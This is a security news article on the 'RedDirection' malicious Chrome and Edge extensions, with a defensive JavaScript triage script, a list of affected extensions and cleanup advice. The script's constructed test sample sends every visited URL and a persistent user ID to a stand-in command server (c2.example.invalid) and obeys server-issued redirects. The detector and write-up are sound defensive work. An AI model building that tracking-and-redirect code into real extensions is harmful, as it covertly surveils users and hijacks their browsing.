A recent investigation by the security team at Koi Security has brought to light a significant threat affecting millions of internet users. The team identified a coordinated campaign involving 18 malicious browser extensions that remain accessible on both the Google Chrome and Microsoft Edge web stores. These extensions have collectively impacted over 2.3 million users, making this one of the most extensive browser hijacking operations in recent years.
How the Malicious Extensions Operate
- Masquerading as Legitimate Tools: The extensions are disguised as productivity or entertainment add-ons, including emoji keyboards, weather apps, VPN proxies, and video speed controllers.
- Functional Yet Harmful: While providing the promised features, these extensions secretly monitor user activity and can redirect browsing sessions.
- Stealthy Updates: The malicious code was introduced through updates after the initial, benign versions were installed. These updates are delivered silently via the browsers’ auto-update systems, making them difficult to detect.
Technical Details
- Data Exfiltration: The extensions use browser navigation APIs to record the URL of every page a user visits together with a unique user ID, and transmit that data to remote servers, so the operators obtain a per-user browsing history.
- Potential for Hijacking: The infrastructure allows attackers to redirect users to potentially harmful destinations, although no such redirections were observed during the researchers’ analysis.
- Centralized Control: All 18 extensions are managed via a single command-and-control infrastructure, despite appearing to originate from different developers. Koi Security has dubbed this campaign “RedDirection”.
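The combination described above (a navigation listener, a stable identifier, an outbound report, and a redirect capability controlled by the server's reply) can be checked for statically once an extension's files are unpacked. The following is an added example written for this page, not Koi Security's tooling or code from any of the listed extensions: it scores an unpacked extension from its manifest permissions and a small set of source-level indicators. The indicator lists, the two sample extensions and the host `c2.example.invalid` are constructed for illustration.

```javascript
// Added example, not Koi Security's tooling: static triage of an unpacked
// extension for the behaviours described above (navigation monitoring,
// identifier collection, exfiltration, redirect capability). Indicator
// lists and both sample extensions are constructed for illustration.
'use strict';

// Permissions that let an extension watch or steer browsing (illustrative list).
const RISKY_PERMISSIONS = new Map([
  ['tabs', 'read the URL of every tab'],
  ['webNavigation', 'observe every navigation event'],
  ['webRequest', 'inspect or block requests'],
  ['declarativeNetRequest', 'rewrite or redirect requests'],
  ['storage', 'persist an identifier across sessions'],
]);
const BROAD_HOSTS = new Set(['<all_urls>', '*://*/*', 'http://*/*', 'https://*/*']);

// Source-level indicators; the label is what the pattern suggests.
const CODE_INDICATORS = [
  { re: /chrome\.(?:tabs\.onUpdated|webNavigation\.on\w+)\.addListener/, what: 'navigation listener' },
  { re: /chrome\.tabs\.update\s*\(/, what: 'redirect capability (rewrites tab URLs)' },
  { re: /crypto\.randomUUID\s*\(|Math\.random\(\)\.toString\(36\)/, what: 'generates a persistent identifier' },
  { re: /\beval\s*\(|new\s+Function\s*\(/, what: 'dynamic code execution' },
];
// Literal remote endpoints passed to fetch() or XMLHttpRequest.open(); captures the host.
const REMOTE_URL = /(?:fetch\s*\(|\.open\s*\(\s*['"]\w+['"]\s*,)\s*['"]https?:\/\/([^\/'"]+)/g;

function triageExtension(ext) {
  const findings = [];
  const perms = ext.manifest.permissions || [];
  // MV2 lists host patterns under "permissions"; MV3 under "host_permissions".
  const hosts = [...perms, ...(ext.manifest.host_permissions || [])];
  for (const p of perms) {
    if (RISKY_PERMISSIONS.has(p)) findings.push(`permission ${p}: ${RISKY_PERMISSIONS.get(p)}`);
  }
  if (hosts.some((h) => BROAD_HOSTS.has(h))) findings.push('host access: all sites');

  const remoteHosts = new Set();
  for (const [file, src] of Object.entries(ext.scripts)) {
    for (const ind of CODE_INDICATORS) {
      if (ind.re.test(src)) findings.push(`${file}: ${ind.what}`);
    }
    for (const m of src.matchAll(REMOTE_URL)) remoteHosts.add(m[1]);
  }

  // The combination described in the write-up: watch navigation, send it out,
  // and keep the ability to send the user somewhere else.
  const watches = findings.some((f) => f.endsWith('navigation listener'));
  const redirects = findings.some((f) => f.includes('redirect capability'));
  let verdict = 'low';
  if (watches && remoteHosts.size > 0) {
    verdict = redirects ? 'high: navigation tracking with redirect capability'
                        : 'medium: navigation tracking with exfiltration';
  }
  return { verdict, findings, remoteHosts: [...remoteHosts].sort() };
}

// Constructed sample: benign behaviour, minimal permissions.
const SAMPLE_BENIGN = {
  manifest: { manifest_version: 3, name: 'Example Picker', permissions: ['activeTab'] },
  scripts: { 'popup.js': 'document.body.addEventListener("click", e => console.log(e.clientX));' },
};

// Constructed sample: works as advertised but reports every URL with a stable
// ID and obeys a redirect instruction from the server (hypothetical host).
const SAMPLE_TRACKER = {
  manifest: {
    manifest_version: 3, name: 'Example Picker',
    permissions: ['tabs', 'webNavigation', 'storage'],
    host_permissions: ['<all_urls>'],
    background: { service_worker: 'bg.js' },
  },
  scripts: {
    'bg.js': `
      const KEY = 'uid';
      chrome.storage.local.get(KEY, r => {
        if (!r[KEY]) chrome.storage.local.set({ [KEY]: crypto.randomUUID() });
      });
      chrome.tabs.onUpdated.addListener((tabId, info, tab) => {
        if (info.status !== 'complete') return;
        chrome.storage.local.get(KEY, r => {
          fetch('https://c2.example.invalid/collect', {
            method: 'POST', body: JSON.stringify({ u: r[KEY], url: tab.url }),
          }).then(res => res.json()).then(cmd => {
            if (cmd.redirect) chrome.tabs.update(tabId, { url: cmd.redirect });
          });
        });
      });`,
  },
};

if (typeof require !== 'undefined' && require.main === module) {
  for (const s of [SAMPLE_BENIGN, SAMPLE_TRACKER]) {
    console.log(JSON.stringify(triageExtension(s), null, 2));
  }
}
```

Run with `node triage.js` to see the benign sample come out as `low` and the tracker as `high`. Two caveats a reviewer should keep in mind: none of these indicators is malicious on its own (`chrome.tabs.update` and `fetch` are ordinary), so the verdict is driven by the combination, and a static check cannot see code that an extension downloads or decodes at runtime, which is why the update-delivered payloads described above still need dynamic inspection.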
List of Malicious Extensions
The table below summarizes some of the identified malicious extensions:
Extension Name | Description |
---|---|
Color Picker, Eyedropper — Geco colorpick | Color selection and eyedropper tool |
Emoji keyboard online — copy&paste your emoji | Emoji keyboard and copy-paste utility |
Free Weather Forecast | Weather forecast application |
Video Speed Controller — Video manager | Video playback speed adjustment |
Unlock Discord — VPN Proxy to Unblock Discord Anywhere | VPN proxy for Discord access |
Dark Theme — Dark Reader for Chrome | Dark mode for web pages |
Volume Max — Ultimate Sound Booster | Volume boosting tool |
Unblock TikTok — Seamless Access with One-Click Proxy | Proxy tool for TikTok access |
Unlock YouTube VPN | VPN for unblocking YouTube |
Risks and Recommendations
- Trusted Appearance: Many of these extensions carried the stores' verification marks and had numerous positive reviews, so a user checking the listing had no visible reason to distrust them.
- Silent Infections: Users may have installed these extensions when they were harmless, only to have them turn malicious through subsequent updates.
- Difficult Removal: Simply uninstalling the extensions may not be sufficient, since the identifiers they stored and any data already sent to the operators remain. Users are advised to clear browsing data and scan for additional malware.
Recommended Actions
- Uninstall any of the listed extensions immediately.
- Clear browser data to remove tracking identifiers.
- Perform a thorough malware scan.
- Monitor online accounts for suspicious activity.